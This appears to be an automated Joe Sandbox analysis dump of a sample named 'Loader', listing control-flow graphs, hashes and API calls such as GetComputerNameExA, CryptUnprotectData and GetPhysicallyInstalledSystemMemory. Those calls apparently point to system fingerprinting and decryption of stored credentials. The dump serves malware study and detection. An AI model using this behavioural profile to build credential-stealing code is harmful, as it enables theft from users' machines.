                                                                                              • Instruction ID: 790b8476bdf2aa560b7988892981d6f6fe0de8a95ee8c2ad5aeec1499147448e
                                                                                              • Opcode Fuzzy Hash: 2db452f1b7869ae9aa98cb25e4805c0568b342052c689d752716c494a3c11a0a
                                                                                              • Instruction Fuzzy Hash: 930203B150C3009FC3149F25D8512ABBBE1EFD6354F18892DE4D94B392E778D94ACB8A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 571 42ff02-42ff5f call 441920 GetComputerNameExA 574 42ff60-42ff92 571->574 574->574 575 42ff94-42ffa2 574->575 576 42ffa4-42ffaf 575->576 577 42ffbb-42ffc7 575->577 578 42ffb0-42ffb9 576->578 579 42ffdb-43002f GetComputerNameExA 577->579 580 42ffc9-42ffcf 577->580 578->577 578->578 582 430030-430078 579->582 581 42ffd0-42ffd9 580->581 581->579 581->581 582->582 583 43007a-430083 582->583 584 430085-43008b 583->584 585 43009b-4300a7 583->585 586 430090-430099 584->586 587 4300bb-430111 585->587 588 4300a9-4300af 585->588 586->585 586->586 591 430120-430165 587->591 589 4300b0-4300b9 588->589 589->587 589->589 591->591 592 430167-430170 591->592 593 430172-430178 592->593 594 43018b-430194 592->594 595 430180-430189 593->595 596 430196-430199 594->596 597 4301ab-430219 call 441920 594->597 595->594 595->595 598 4301a0-4301a9 596->598 602 430220-430268 597->602 598->597 598->598 602->602 603 43026a-430273 602->603 604 430275-43027f 603->604 605 43028d 603->605 607 430280-430289 604->607 606 430290-4302a5 605->606 609 4302ab-4302b2 606->609 610 4303e8-43042f 606->610 607->607 608 43028b 607->608 608->606 611 4302c0-4302d0 609->611 612 430430-43044a 610->612 613 4302d2-4302da 611->613 614 4302e0-4302e6 611->614 612->612 615 43044c-430457 612->615 616 430305 613->616 617 430330-43033e 614->617 618 4302e8-4302eb 614->618 619 43046b-43046e call 4343b0 615->619 620 430459-43045f 615->620 622 430308-43030e 616->622 625 430340-430343 617->625 626 43039b-4303a3 617->626 618->617 621 4302ed-430302 618->621 631 430473-430488 619->631 623 430460-430469 620->623 621->616 630 430310-430316 622->630 623->619 623->623 625->626 627 430345-430396 625->627 628 4303b0-4303b3 626->628 629 4303a5-4303ab 626->629 627->622 632 4303b5-4303d9 628->632 633 4303de-4303e3 628->633 629->630 630->610 634 43031c-43031e 630->634 632->616 633->616 634->611 635 430320 634->635 635->610
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042FF33
                                                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042FFF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: 9492$~PF9
                                                                                              • API String ID: 3545744682-997091799
                                                                                              • Opcode ID: 6b80d6b28ac80613a9a5095130e55e60f57fa8343b367d738bcb2d7fe2474cb5
                                                                                              • Instruction ID: c5a370fb91bccdff778e028682b2ac8ed0f6fa19a796bdc803eab0a3459f0821
                                                                                              • Opcode Fuzzy Hash: 6b80d6b28ac80613a9a5095130e55e60f57fa8343b367d738bcb2d7fe2474cb5
                                                                                              • Instruction Fuzzy Hash: 09F1C520204B818FD7258F35C4A07A3BBE1DF57304F089AAEC5EA8B796D739A509C765

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 642 442310-442324 643 442330-442339 642->643 643->643 644 44233b-442342 643->644 645 442344-442349 644->645 646 44234b 644->646 647 44234e-442378 call 4083f0 645->647 646->647 650 442391-44240f 647->650 651 44237a-44237f 647->651 653 442410-442455 650->653 652 442380-44238f 651->652 652->650 652->652 653->653 654 442457-442462 653->654 655 4424b4-4424c6 call 408400 654->655 656 442464-44246f 654->656 658 442470-442477 656->658 660 442480-442486 658->660 661 442479-44247c 658->661 660->655 663 442488-4424a8 call 43fe80 660->663 661->658 662 44247e 661->662 662->655 665 4424ad-4424b2 663->665 665->655
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: @$Pt1
                                                                                              • API String ID: 2994545307-1130223541
                                                                                              • Opcode ID: 8b88c9d42619fdf3639c75d852dccaf8f99f9a5f5c1538215e92a440236f6825
                                                                                              • Instruction ID: 762966e0024e2f811452fd3475ceb21ce7c9507d35c993960137955cd7e5d894
                                                                                              • Opcode Fuzzy Hash: 8b88c9d42619fdf3639c75d852dccaf8f99f9a5f5c1538215e92a440236f6825
                                                                                              • Instruction Fuzzy Hash: 774154729083108BD714CF24CC8576BBBF1EF89318F48952DE9895B391E77C9808C7AA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 666 430a2d-430a62 667 430a70-430a97 666->667 667->667 668 430a99-430aa2 667->668 669 430aa4-430aaa 668->669 670 430abb-430aeb 668->670 671 430ab0-430ab9 669->671 673 430af0-430b4f 670->673 671->670 671->671 673->673 674 430b51-430b5a 673->674 675 430b7d 674->675 676 430b5c-430b65 674->676 678 430b80-430b8c 675->678 677 430b70-430b79 676->677 677->677 679 430b7b 677->679 680 430ba1-430be4 call 441920 GetPhysicallyInstalledSystemMemory call 420eb0 678->680 681 430b8e 678->681 679->678 687 430be9-430c07 680->687 682 430b90-430b9d 681->682 682->682 684 430b9f 682->684 684->680 688 430c10-430c6d 687->688 688->688 689 430c6f-430c99 688->689 690 430ca0-430cba 689->690 690->690 691 430cbc-430cc5 690->691 692 430cc7-430ccd 691->692 693 430cdd 691->693 694 430cd0-430cd9 692->694 695 430ce0-430ce8 693->695 694->694 696 430cdb 694->696 697 430cfb-430d07 695->697 698 430cea-430ceb 695->698 696->695 700 430d1b-430d77 697->700 701 430d09-430d0f 697->701 699 430cf0-430cf9 698->699 699->697 699->699 702 430d80-430dc9 700->702 703 430d10-430d19 701->703 702->702 704 430dcb-430dd4 702->704 703->700 703->703 705 430dd6-430ddf 704->705 706 430ded 704->706 707 430de0-430de9 705->707 708 430df0-430dfc 706->708 707->707 709 430deb 707->709 710 430e1b-430eaf 708->710 711 430dfe-430e04 708->711 709->708 712 430e10-430e19 711->712 712->710 712->712
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0865ff396c9f31bd00d6471c11da108d6daaffe263a47b51c8682f0f61b93280
                                                                                              • Instruction ID: c41996d6be1be0281655a90a2f931e4352d4469a4f0e40524e32909b16dd1d88
                                                                                              • Opcode Fuzzy Hash: 0865ff396c9f31bd00d6471c11da108d6daaffe263a47b51c8682f0f61b93280
                                                                                              • Instruction Fuzzy Hash: E2C1FB71604B818EE729CF3A84607A3FBD2AF96314F18896EC0DB8B796C7796405CB15
                                                                                              APIs
                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00430BCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3960555810-0
                                                                                              • Opcode ID: 9f289d5757a538b4c885218912d6092fbaada42926bac588fbfe283fbe5e7a7a
                                                                                              • Instruction ID: 74e9f428b7ddc1b0874e61ceaf1e38c08bc6e2e383f822383331b4d43887de6d
                                                                                              • Opcode Fuzzy Hash: 9f289d5757a538b4c885218912d6092fbaada42926bac588fbfe283fbe5e7a7a
                                                                                              • Instruction Fuzzy Hash: 1AB10D71604B818EE329CF3AC450763FBD2AF96314F188A6EC4DB87796C779A406CB15
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041DCC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: cf1a30e3a9a6684cf940b775ba8c155667198d7163f8efb9c0950d58adac7a58
                                                                                              • Instruction ID: 8089a83c30d84776a4fbe1cd0daaa6c19abfb4c3b5294b302e85351d35d8d255
                                                                                              • Opcode Fuzzy Hash: cf1a30e3a9a6684cf940b775ba8c155667198d7163f8efb9c0950d58adac7a58
                                                                                              • Instruction Fuzzy Hash: AB51E4B190C3515FC724CF28C4917ABBBE2AF95314F09492EE4D587382E239E949CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3019521637
                                                                                              • Opcode ID: d337d3c8ca4ae0ea32d379bb303ce7becb27304579ffd5d467678ed5c82d8510
                                                                                              • Instruction ID: 33451035f238856737725fffee409144898852feadc4b188259265e81bb19071
                                                                                              • Opcode Fuzzy Hash: d337d3c8ca4ae0ea32d379bb303ce7becb27304579ffd5d467678ed5c82d8510
                                                                                              • Instruction Fuzzy Hash: CBA148727083019FD718CE28CC8162BB7E2EB88701F19853DE985CB351DB38DE098796
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: ee2a3addf450d8ecbdf4e1fc10c001ddee34545fdfe2953304fad982b7111771
                                                                                              • Instruction ID: 9a351a88f2d3537b0affbde4b68c52ecbcbbf68fbdfa6c984787b6d7ee4c7584
                                                                                              • Opcode Fuzzy Hash: ee2a3addf450d8ecbdf4e1fc10c001ddee34545fdfe2953304fad982b7111771
                                                                                              • Instruction Fuzzy Hash: 12219FA0504B808ED7228F3598117A3BBF0AF63204F4549ADC3E7972A3C738650ADB29
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(0041207F), ref: 0043FEAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: 5|iL
                                                                                              • API String ID: 2994545307-1880071150
                                                                                              • Opcode ID: 77b3a33a0d6a83b759d9e00ca1f0b7d1980bb83ebeb92031fe45eb8d4b8efc3d
                                                                                              • Instruction ID: aa6fad3222425eac993971c399a85b00b2bb6d9c590e3ce03f8c5ddc944b96ad
                                                                                              • Opcode Fuzzy Hash: 77b3a33a0d6a83b759d9e00ca1f0b7d1980bb83ebeb92031fe45eb8d4b8efc3d
                                                                                              • Instruction Fuzzy Hash: F74185367083006FE314DF69DD80B7BF7E6EB89300F99893DE68897351E7B4A9048659
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: @
                                                                                              • API String ID: 2994545307-2766056989
                                                                                              • Opcode ID: 097e4d5f0a5a81daa57f148062418186cc4a37d79780d31817a60a84340fd428
                                                                                              • Instruction ID: 5bd979e7b42bc9ad17b838acd9b6abf0da18b45bc182c34558b6f51f125c4420
                                                                                              • Opcode Fuzzy Hash: 097e4d5f0a5a81daa57f148062418186cc4a37d79780d31817a60a84340fd428
                                                                                              • Instruction Fuzzy Hash: B33110326083008BD314DF28C8D066FFBF5FB9A354F45982EE98987291D7B5A908875A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 0df8be95fb5107f51a2a052c0dc519afd675d1ef8d30bea3a6c99a4bf0bb95de
                                                                                              • Instruction ID: 0dc7eea42554371365717e72352744fbb2fb44298d62a1295c9999dfefdfe945
                                                                                              • Opcode Fuzzy Hash: 0df8be95fb5107f51a2a052c0dc519afd675d1ef8d30bea3a6c99a4bf0bb95de
                                                                                              • Instruction Fuzzy Hash: BF9179B5B143114BDB149E25EC9277BB7D1DF82318F98403EE4C647392E6389C0AC35A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df2ccab0c6c42c78bc00a7e8cafd20fe57229c4e1fd4fa4773ce3959f4f4b0cb
                                                                                              • Instruction ID: 5e3cae1b69016b53965584127651527020ed66b9ac41f3f5f504947fa2e6c883
                                                                                              • Opcode Fuzzy Hash: df2ccab0c6c42c78bc00a7e8cafd20fe57229c4e1fd4fa4773ce3959f4f4b0cb
                                                                                              • Instruction Fuzzy Hash: 2B512A75A08301AFD310DF65EC41A6F77E4EB8A318F04853DF685C3291EB749909879B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: fd6abb364a73ec27b6f331a54ba4d6a2171968eaf0281fd0b78c8c47f3c5d4f7
                                                                                              • Instruction ID: b500ecd861c5f9226f46c0b59c9e96814d68e26127886e1ff7441bae7b1ad6d0
                                                                                              • Opcode Fuzzy Hash: fd6abb364a73ec27b6f331a54ba4d6a2171968eaf0281fd0b78c8c47f3c5d4f7
                                                                                              • Instruction Fuzzy Hash: 8B4103343047509FE3258B2998A0BB3BBE2EF47300F98886DD1D78B292D769A815C759

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 444 438bc8-438c03 call 441920 GetUserDefaultUILanguage 447 438c08-438c13 444->447 447->447 448 438c15 447->448 449 438c17-438c1a 448->449 450 438c54-438c7f 449->450 451 438c1c-438c52 449->451 451->449
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00438BE8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguageUser
                                                                                              • String ID: =$>$?$A
                                                                                              • API String ID: 95929093-648040527
                                                                                              • Opcode ID: 89303860c738dd35d219bf092242f9952afdc63adf7b5188b8ff3a635fb62cb3
                                                                                              • Instruction ID: 147d37096fa15d592a57f95b5470aba2423b0860a1e7183d1e5050d0b0eeea26
                                                                                              • Opcode Fuzzy Hash: 89303860c738dd35d219bf092242f9952afdc63adf7b5188b8ff3a635fb62cb3
                                                                                              • Instruction Fuzzy Hash: 63113AB2E051E48FDF29CB7CD8543ACBFA26F9A200F1C81ADD949933C6DA344944C710

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 636 40cc90-40ccc0 CoInitializeEx
                                                                                              APIs
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CCA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID: RL`;
                                                                                              • API String ID: 2538663250-3979800082
                                                                                              • Opcode ID: c447d9eb50c69d690079a84f2a889e3a873e1851efedca1d7b0de6d2c5cd5276
                                                                                              • Instruction ID: 33473149cae9f16aecb9537aa416ef1e7d3fbdedf0e957a2ab0c977a9e71e0a7
                                                                                              • Opcode Fuzzy Hash: c447d9eb50c69d690079a84f2a889e3a873e1851efedca1d7b0de6d2c5cd5276
                                                                                              • Instruction Fuzzy Hash: 28D0A7345641447BD254B71DDC0BF2E36EC8B83765F40423AB367C61D2DD206814D969

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0044097C
                                                                                              • GetForegroundWindow.USER32 ref: 0044098B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ForegroundWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2020703349-0
                                                                                              • Opcode ID: 5b64466e7ab07e9aaddd3662eb9f553eb55b9fff43f682d448942c2c90120e2c
                                                                                              • Instruction ID: 225f5cf4cede43eb9e1c7d8f48ca6fabcfa3516809063a9c4dd713f8755281a5
                                                                                              • Opcode Fuzzy Hash: 5b64466e7ab07e9aaddd3662eb9f553eb55b9fff43f682d448942c2c90120e2c
                                                                                              • Instruction Fuzzy Hash: 17D0C7F99105008BD705D791BC4942E33359B9660D754C03EF50641637EB2850198B6B
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043FE43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 07258b1e357849fe5aed5c24d00c3c5a91de2245688a67431115fabb2ccab738
                                                                                              • Instruction ID: 535b60dbec632ae62a93662f24e53747b26a8b075638c01559b15ba54056591b
                                                                                              • Opcode Fuzzy Hash: 07258b1e357849fe5aed5c24d00c3c5a91de2245688a67431115fabb2ccab738
                                                                                              • Instruction Fuzzy Hash: 34118C37B083044BC7089F38EC9166BB7D6EBC9214F19863DE895832A0DE3DC8058242
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 0043D40F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 9ae81342e96db7dc8802243649a6a2d497a458aa62fba63f2f96d7ae65237da3
                                                                                              • Instruction ID: 6ec60103242f7dc88c84b297cd958d62bee6b326450107854347a78a1e499a11
                                                                                              • Opcode Fuzzy Hash: 9ae81342e96db7dc8802243649a6a2d497a458aa62fba63f2f96d7ae65237da3
                                                                                              • Instruction Fuzzy Hash: 420126367456409BC6115E28AC926DB7BF5DBE6225F44097CE5804B391C229CC1AD7D2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 360d3ba3518a5f389f4047cb9ef391a0485252ecdcba09ffad12c168825f6478
                                                                                              • Instruction ID: 936c20df29cb9a486113d9d5386173b1c22316c364d98bb2364a03aefed94a80
                                                                                              • Opcode Fuzzy Hash: 360d3ba3518a5f389f4047cb9ef391a0485252ecdcba09ffad12c168825f6478
                                                                                              • Instruction Fuzzy Hash: 63F0A9B45097018FD314DF28D1A875ABBF1FB89304F10481CE0968B3A0C7B5A949CF82
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 9593223d512cbb9efcb00319b62ef73b02fc9f54ce1cf4f3d45371c5e5345829
                                                                                              • Instruction ID: 6a288c34b7eeda970e55558a1ff922c66b4fcfcf440e52d196057f1a93ba68b1
                                                                                              • Opcode Fuzzy Hash: 9593223d512cbb9efcb00319b62ef73b02fc9f54ce1cf4f3d45371c5e5345829
                                                                                              • Instruction Fuzzy Hash: F0F0DAB85497018FD310DF28D1A875ABBF1FB88304F10891CE4958B390C7B5A648CF82
                                                                                              APIs
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CCD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 640775948-0
                                                                                              • Opcode ID: 9ca94e2dc28c8b217394d1bc984aa02c1a453ef65657c9050c23c9268935b427
                                                                                              • Instruction ID: e9db78c129ca3057cd7ccbb40b8044497352764c7ff97d4d1128b699e2075847
                                                                                              • Opcode Fuzzy Hash: 9ca94e2dc28c8b217394d1bc984aa02c1a453ef65657c9050c23c9268935b427
                                                                                              • Instruction Fuzzy Hash: E4D0C9343D4341B7F6A48748AC67F1832165B42F65F344628B373FE2D1C9E171158A1D
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 0043D385
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 6234599c2abce4c02a9914a3db1980e552edefda40f5aef7d0eafc6bdc90bbb6
                                                                                              • Instruction ID: bf09ca323fc3d6391422b3d444ecbd49a42e3e4963b95dfec9337ab1fb010638
                                                                                              • Opcode Fuzzy Hash: 6234599c2abce4c02a9914a3db1980e552edefda40f5aef7d0eafc6bdc90bbb6
                                                                                              • Instruction Fuzzy Hash: 40B00234145115F9F17117225CD5F7F1D6CDF83E95F101054B604140D04758A441D5BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CV$KV$LM$T>$de${&,V$IK$SQ$WU
                                                                                              • API String ID: 0-2785706729
                                                                                              • Opcode ID: a08963325b429d1639c9c944a67626c7d159cd0fc2d7761e34e1696eec19556d
                                                                                              • Instruction ID: c05b56064417488df7b5ad894cc327f978f744e3c9a69050ef52c0fe2625d5ba
                                                                                              • Opcode Fuzzy Hash: a08963325b429d1639c9c944a67626c7d159cd0fc2d7761e34e1696eec19556d
                                                                                              • Instruction Fuzzy Hash: 79D1ECB5608350DFE7108F25E89136BBBE0EF86304F54496DE4C59B3A2E7788905CB8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #]'[$()$:A'_$<YgW$?M0K$?mk$`Qo$m9O7$m9O7
                                                                                              • API String ID: 0-2239177406
                                                                                              • Opcode ID: ad4ac1f20a39d7627629bbb536eae6c3a46a10934f01ca677e70357ef9f1301a
                                                                                              • Instruction ID: 7cc7ec01a88f836476e3a9d4eb6dc17f6aec6df3a7141e6de1b78b286174b201
                                                                                              • Opcode Fuzzy Hash: ad4ac1f20a39d7627629bbb536eae6c3a46a10934f01ca677e70357ef9f1301a
                                                                                              • Instruction Fuzzy Hash: 51E1E9B424D3858BE3758F16A981BDBBBE1FB82340F108E1DC1D95B245DB74808ADF96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /Md`$7Voo$Iy~s$\)$djm`$jhjr$ujcw$yrtp
                                                                                              • API String ID: 0-3965858319
                                                                                              • Opcode ID: 53b1f0067b654910e4265debf126ad5a16fe9aace6d1d90405a1036c1b5e4eb5
                                                                                              • Instruction ID: 84e6723ad12d9368427c1e0721b53ee5dd72bd27f2c6b2f42766d7d241e4870c
                                                                                              • Opcode Fuzzy Hash: 53b1f0067b654910e4265debf126ad5a16fe9aace6d1d90405a1036c1b5e4eb5
                                                                                              • Instruction Fuzzy Hash: 57517B3174A3A28BE7309E2894513AFBBE1DF91350FA4892FC5D587381DB3C9905E74A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
